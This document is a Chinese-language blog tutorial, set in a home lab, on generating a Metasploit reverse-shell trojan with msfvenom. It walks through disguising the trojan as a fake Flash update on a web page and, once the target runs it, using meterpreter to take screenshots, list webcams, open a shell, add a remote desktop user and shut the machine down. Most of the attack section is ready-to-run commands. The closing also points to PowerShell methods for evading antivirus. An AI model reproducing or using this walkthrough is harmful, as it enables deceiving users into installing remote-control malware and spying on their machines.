放纵自己的欲望是最大的祸害;谈论别人的隐私是最大的罪恶;不知自己过失是最大的病痛。 ——亚里士多德
写在前面
本想介绍几种生成免杀木马的方法,但经过实验发现这几种方法已经失效,可以被360或者腾讯安全管家查杀。所以本文的木马不具备免杀功能。
准备环境:入侵机器:kali linux (IP地址:192.168.96.128)
靶机:window server 2003 (IP地址:192.168.96.129)
1.生成木马
打开kali终端输入
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.96.128 LPORT=4444 -f exe -o flash.exe
参数详解:
-p:指定payload
LHOST:指定入侵机器kali linux的IP地址
LPORT:指定监听端口
-f:指定文件类型
-o:指定输出的木马文件名![]()
此时便会在root目录下生成一个名为flash.exe的木马文件
2.编写木马网页
这里简单地编写一个名叫index.html的网页,用来让用户下载安装我们的木马程序。![]()
![]()
接下来我们将index.html和flash.exe木马文件移动到/var/www/html目录下,使用如下命令。(针对kali2.0,kali1.0在/var/www目录下)
mv index.html flash.exe /var/www/html
开启apach2:service apache2 start![]()
我们打开msfconsole开始监听
打开终端输入msfconsole
使用监听模块:use exploit/multi/handler
设置payload:set payload windows/meterpreter/reverse_tcp
设置攻击机kali linux的地址:set lhost 192.168.96.128 (ip要与生成木马时的ip一致)
设置监听端口:set lport 4444 (端口要与生成木马时的端口一致)![]()
开始运行:exploit
3.访问木马网页
打开靶机浏览器,访问Kali搭建好的网站
在地址框输入攻击机ip地址192.168.96.128![]()
提示没有访问权限![]()
回到我们的攻击机上,进入/var/www/htm目录给它赋予权限
cd /var/www/html
chmod 777 index.html![]()
我们再次回到靶机,访问192.168.96.128![]()
提示我们flash过旧,安装新的flash插件,我们点击确定![]()
我们点击运行
回到我们的攻击机kail linux上,发现已经有一个meterpreter会话产生![]()
4.控制靶机
1.获取靶机基本信息:sysinfo![]()
2.获取靶机屏幕截图:screenshot![]()
由上图提示,图片已被保存到root目录下,打开文件夹,查看图片![]()
捕获到的靶机屏幕截图
3.摄像头
查看靶机有几个摄像头:webcam_list
靶机摄像头视频获取:webcam_stream
由于这里的靶机是windons server 2003,没有摄像头,所以这里无法演示。
4.查看靶机当前目录文件:dir![]()
由于木马程序的位置是在桌面,所以获取了桌面下的所有文件。
5.在靶机上启动程序:execute
我们这里以启动靶机上的计算器为例
execute -f calc.exe![]()
回到靶机,计算器已被启动![]()
6.查看靶机的实时屏幕:run vnc![]()
7.进入靶机的命令行:shell
这里你可在对方的电脑上执行一些cmd命令![]()
8.查看靶机上正在运行的程序:ps
你可以用run post/windows/manage/migrate将进程迁移到其他程序,也可以将其他程序关闭![]()
9.进入靶机的远程桌面
第一步,先开启靶机的3389远程桌面:run getgui -e![]()
第二步,在靶机上新建一个用来登陆远程桌面的用户:run getgui -u kali -p password
这里新建了一个用户名为kali 密码为password的用户![]()
第三步:登陆靶机的远程桌面
rdesktop -u kali -p password 192.168.96.129:3389![]()
这个时候就可以像操作自己电脑一样操控靶机
10.恶搞,让靶机主人好好学习
先进入靶机命令行:shell
创建txt文件:cd 1.txt![]()
然后编辑1.txt文件:edit 1.txt
这时候会打开vim编辑器,按i进入编辑模式,写入一句话
Children,study hard,don’t play computer all day ,i will shutdown your computer![]()
写入完毕,我们按Esc,再按住shift+:,在:后面输入x保存退出
回到靶机上,已经新建了一个txt文件![]()
我们打开这个文件,正是刚才写入的一句话![]()
11.关闭靶机电脑
在攻击机上输入shutdown
回到靶机![]()
![]()
结束语
metasploit这个渗透框架功能十分强大,更多的功能你们可以自行尝试。
这里不足之处就是这个木马不能免杀,安装有腾讯安全卫士或者360的电脑能立马查杀出来。当然还有其他的免杀方式,或者也可以用powershell来达到免杀效果,杀毒软件一般是无法查杀的。
下期为大家带来powershell入侵思路,再见。
推荐链接:metasploit入侵思路分享 - 403工作室laohuan.art![]()
转播
